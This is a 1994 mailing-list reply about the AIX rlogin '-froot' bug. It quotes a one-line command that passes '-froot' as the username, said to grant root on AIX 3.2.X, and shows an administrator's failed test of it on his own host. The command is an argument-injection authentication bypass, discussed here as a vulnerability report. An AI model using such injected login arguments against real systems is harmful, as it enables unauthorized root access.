Re: -froot??? (AIX rlogin bug)

Alexander Haiut (
Sat, 30 Jul 1994 18:14:01 +0200 (GMT+0200)

On Fri, 29 Jul 1994, Eric Wedaa wrote:

> [header deleted]
> Someone over on the firewalls mailing list just threw out this tidbit:
>  rlogin aix.machine -l -froot

  huh.. yes, i've heard about this bug a few months ago,
  and read it on firewalls mailing list once again.. :)

> For instance:
>  rlogin foobar -l -froot
> This gives you root access on any AIX 3.2.X machine.
> [...]
> >>>>>>Ericw

  sure, i've tested it immidietly, but.. at least on my
  AIX it fails.. any ideas ?
  here are my attempts :

	skyblue% /bin/rlogin skyblue -l -froot
	login: Not a recognized flag: r
	3004-023 -"r" is not a valid option to login.

	Connection closed.

	skyblue% uname -nsvr
	AIX skyblue 2 3

  [using /bin/rlogin 'coz /usr/bin/rlogin and /usr/ucb/rlogin 	]
  [are both symbolic links to /bin/rlogin ..			]	

  should i (as an admin) be happy that bug is closed on AIX
  version i use, or ... where am i wrong ?
  thanx a lot in advance !


  Alexander L. Haiut		 	
  Ben-Gurion University of the Negev,
  Beer-Sheva, Israel
  e-mail :
  voice  : +972-3-391329